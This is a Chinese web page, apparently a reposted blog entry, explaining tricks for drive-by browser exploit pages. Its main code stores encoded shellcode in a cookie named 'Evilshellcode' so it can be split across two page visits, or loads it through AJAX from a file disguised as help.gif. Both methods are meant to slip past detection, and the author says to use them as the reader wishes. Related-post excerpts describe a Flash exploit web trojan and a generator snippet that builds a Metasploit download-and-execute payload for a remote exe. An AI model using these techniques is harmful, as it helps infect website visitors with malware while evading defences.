一个网马的tips实现分析

cookie示例代码:


代码如下:

//存放
function setCookie(sVar, sVal){
theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC';
document.cookie = theCookie;}
shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec......"
setCookie('Evilshellcode', shellcode);
//取出
function getCookie(sVar){
cookies = document.cookie.split('; ');
for(var i = 1; i <= cookies.length; i++){
if(cookies[i - 1].split('=')[0] == sVar){return cookies[i - 1].split('=')[1];}}
return '';
}
a=unescape(getCookie('Evilshellcode'))

cookie存放的话,可以挂两次,第一次挂cookie写入代码无害,第二次再取出来结合新挂的代码来运行。怎么用随你了。

ajax来调用


代码如下:

<script src="http://jqueryjs.googlecode.com/files/jquery-1.3.2.min.js" type="text/javascript"></script>
var shellcode = $.ajax({
url: "help.gif",
async: false
}).responseText

help.gif内容

%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9%0001%a500%fde2%e0ff%00e8%0000%6a00%eb08%1b6c%46c6%ed79%ef56%9836%8afe%aa0e%0dfc%9e7c%bbf9%b035%2d49%7edb%e2d8%8e73%0e4e%75ec

(0)

相关推荐

  • 一个网马的tips实现分析

    cookie示例代码: 复制代码 代码如下: //存放 function setCookie(sVar, sVal){ theCookie = sVar + '=' + sVal + '; expires=Fri, 1 Jul 2020 09:45:27 UTC'; document.cookie = theCookie;} shellcode="%9090%9090%00e8%0000%5e00%8b64%303d%0000%8100%00c7%0008%8b00%83c7%1dc0%20b9

  • FLASH网马官方补丁

    最近几天拦截到利用Adobe Flash Player SWF文件漏洞的网马,该网马通过网页加载一个正常的FLASH文件,再在那个FLASH文件里调用嵌入恶意构造的FLASH文件,这时会导致溢出,从而可能执行任意指令.以下为调用页内容: <script> window.onerror=function(){return true;} function init(){window.status="";}window.onload = init; if(document.coo

  • C#编写一个网游客户端的完整步骤

    C#编写一个网游客户端的完整步骤

    目录 一.认识NetworkStream(网络流) 二.连接服务器 三.客户端向服务器发送数据 四.实现播放背景音乐 五.实现游戏背景图片变换 六.小结 七.参考资料 总结 本过程是使用Virtual Studio 2019实现的,利用老师给出的框架进行的修改. 一.认识NetworkStream(网络流) 1.NetworkStream的相关知识点 ①NetworkStream只能使用于具有TCP/IP协议之中,用于UDP中虽然不会报错,但是会出现异常. ②NetworkStream是面向连接

  • php和数据库结合的一个简单的web实例 代码分析 (php初学者)

    然而,除了安装部分,有或多或少的针对于Windows的说明外,其它部分对所有的平台都是一样的.顺便说一下,关于安装部分,请看本站的安装指南.在这个教程中,我们将一步一步地建立一个小的网站,使用了PHP和MySQL的下面特性: 1. 查看数据库: 2. 编辑数据库的记录: 3. 修改数据库的记录: 4. 删除数据库的记录. 我们将同时学习MySQL和PHP,一起去感觉它们.本文直接从这里学,如果不会安装配置Apache+PHP+Mysql请查看网页教学网相关文章吧! 先运行web服务器(已增加PH

  • 基于一个应用程序多线程误用的分析详解

    一.需求和初步实现很简单的一个windows服务:客户端连接邮件服务器,下载邮件(含附件)并保存为.eml格式,保存成功后删除服务器上的邮件.实现的伪代码大致如下: 复制代码 代码如下: public void Process()        {            var recordCount = 1000;//每次取出邮件记录数            while (true)            {                using (var client = new Pop

  • 一个Vue页面的内存泄露分析详解

    什么是内存泄露?内存泄露是指new了一块内存,但无法被释放或者被垃圾回收.new了一个对象之后,它申请占用了一块堆内存,当把这个对象指针置为null时或者离开作用域导致被销毁,那么这块内存没有人引用它了在JS里面就会被自动垃圾回收.但是如果这个对象指针没有被置为null,且代码里面没办法再获取到这个对象指针了,就会导致无法释放掉它指向的内存,也就是说发生了内存泄露.为什么代码里面会拿不到这个对象指针了呢,举一个例子: // module date.js let date = null; expo

  • JavaScript中将一个值转换为字符串的方法分析[译]

    译者注:前两天在看ES5的时候顺便出了一道题,今天看到这篇文章,刚好解释的很清楚,就翻译了一下.在JavaScript中,主要有三种方法能让任意值转换为字符串.本文讲解了每种方法以及各自的优缺点. 1.转换字符串的三种方法 这三种将value转换为字符串的方法是: 1.value.toString() 2."" + value 3.String(value) 第一种方法存在的问题是,它不能把null和undefined转换为字符串.还有第二种和第三种方法,这两种方法的效果基本一样. •

  • Javascript-Mozilla和IE中的一个函数直接量的问题分析

    我在这里写这个也是写点在做js时遇到的问题,当个笔记.没有想到被hax "批"了一顿,不过也是说得有些道理的.毕竟这个内容也不痛不痒的 一般情况下,我们在JS中用函数直接量来命名一个简单的函数. <script type="text/javascript"> var func=function(s){window.alert(s)}; func("never-online") </script> 这在IE或者Mozilla

  • Python判断一个list中是否包含另一个list全部元素的方法分析

    本文实例讲述了Python判断一个list中是否包含另一个list全部元素的方法.分享给大家供大家参考,具体如下: 你可以用for in循环+in来判断 #!/usr/bin/env python # coding: utf-8 a = [1, 2, 3, 4, 5] b = [3, 4, 5] d = [False for c in b if c not in a] if d: print "a不包含b的所有元素" else: print "a包含b的所有元素"

  • 网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

    'code by lcx On Error Resume Next Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" ) url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MO

随机推荐